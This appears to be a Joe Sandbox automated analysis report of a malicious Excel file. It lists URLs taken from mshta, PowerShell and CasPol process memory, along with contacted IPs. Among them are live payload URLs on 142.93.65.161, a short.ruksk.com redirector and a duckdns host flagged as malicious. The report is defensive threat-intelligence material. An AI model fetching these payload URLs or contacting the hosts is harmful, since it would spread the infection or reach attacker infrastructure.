http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhv5265.tmp.29.dr | false | | high
http://www.nirsoft.net | CasPol.exe, 0000001D.00000002.547843346.0000000000224000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTm | mshta.exe, 00000004.00000002.446412500.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhv5265.tmp.29.dr | false | | high
https://www.google.com | CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0I | powershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...r | mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | CasPol.exe, 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://o.aolcdn.com/ads/adswrappermsni.js | bhv5265.tmp.29.dr | false | | high
http://www.msn.com/?ocid=iehp | bhv5265.tmp.29.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://static.chartbeat.com/js/chartbeat.js | bhv5265.tmp.29.dr | false | | high
http://www.msn.com/de-de/?ocid=iehp | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemaker | mshta.exe, 00000004.00000003.440649981.0000000000162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446606437.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta... | mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.467820686.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.523814321.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002141000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.cr | powershell.exe, 00000007.00000002.474546983.000000001C45C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.505629322.000000001C211000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htay | mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhv5265.tmp.29.dr | false | | high
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhv5265.tmp.29.dr | false | | high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhv5265.tmp.29.dr | false | | high
http://www.imvu.com | CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contextual.media.net/ | bhv5265.tmp.29.dr | false | | high
https://short.ruksk.com/us | mshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhv5265.tmp.29.dr | false | | high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFp | powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.msn.com/ | bhv5265.tmp.29.dr | false | | high
https://res.cloudinary.com | powershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFA | powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | CasPol.exe | false | | high
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | bhv5265.tmp.29.dr | false | | high
https://policies.yahoo.com/w3c/p3p.xml | bhv5265.tmp.29.dr | false | | high
https://short.ruksk.com/Dat | mshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.msn.com/advertisement.ad.js | bhv5265.tmp.29.dr | false | | high
http://b.scorecardresearch.com/beacon.js | bhv5265.tmp.29.dr | false | | high
http://acdn.adnxs.com/ast/ast.js | bhv5265.tmp.29.dr | false | | high
http://ocsp.entrust.net03 | mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_flash | CasPol.exe, 0000001D.00000002.549016177.0000000002363000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC: | mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhv5265.tmp.29.dr | false | | high
http://142.93.65.161/ | mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhv5265.tmp.29.dr | false | | high
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhv5265.tmp.29.dr | false | | high
http://go.micros | powershell.exe, 00000007.00000002.467820686.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_ | 0200011080.xls, CC430000.0.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | |
                                                                                                                              high
                                                                                                                              http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF1powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv5265.tmp.29.drfalse
                                                                                                                                high
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerXmshta.exe, 0000000E.00000002.492377174.00000000000CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerLmshta.exe, 0000000E.00000002.492377174.0000000000113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerOmshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv5265.tmp.29.drfalse
                                                                                                                                  high
                                                                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv5265.tmp.29.drfalse
                                                                                                                                      high
                                                                                                                                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv5265.tmp.29.drfalse
                                                                                                                                        high
                                                                                                                                        https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                                                          high
                                                                                                                                          https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerImshta.exe, 00000004.00000002.446390710.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKymshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv5265.tmp.29.drfalse
                                                                                                                                              high
                                                                                                                                              https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerAmshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC:mshta.exe, 0000000E.00000003.490334526.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv5265.tmp.29.drfalse
                                                                                                                                                high
                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://142.93.65.161/6mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv5265.tmp.29.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htakmshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker/mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://contextual.media.net/8/nrrV73987.jsbhv5265.tmp.29.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.1mshta.exe, 00000004.00000003.443541028.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445667762.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.488460874.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv5265.tmp.29.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC:powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://short.ruksk.com/mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0nmshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaGmshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhv5265.tmp.29.drfalse
                                                                                                                                                              high
IP              Domain                     Country        ASN    ASN Name            Malicious
142.93.65.161   unknown                    United States  14061  DIGITALOCEAN-ASNUS  true
31.13.224.72    apamanollonan.duckdns.org  Bulgaria       48584  SARNICA-ASBG        true
178.237.33.50   geoplugin.net              Netherlands    8455   ATOM86-ASATOM86NL   false
151.101.65.137  cloudinary.map.fastly.net  United States  54113  FASTLYUS            false
54.150.207.131  short.ruksk.com            United States  16509  AMAZON-02US         false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567364
Start date and time: 2024-12-03 13:59:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 33
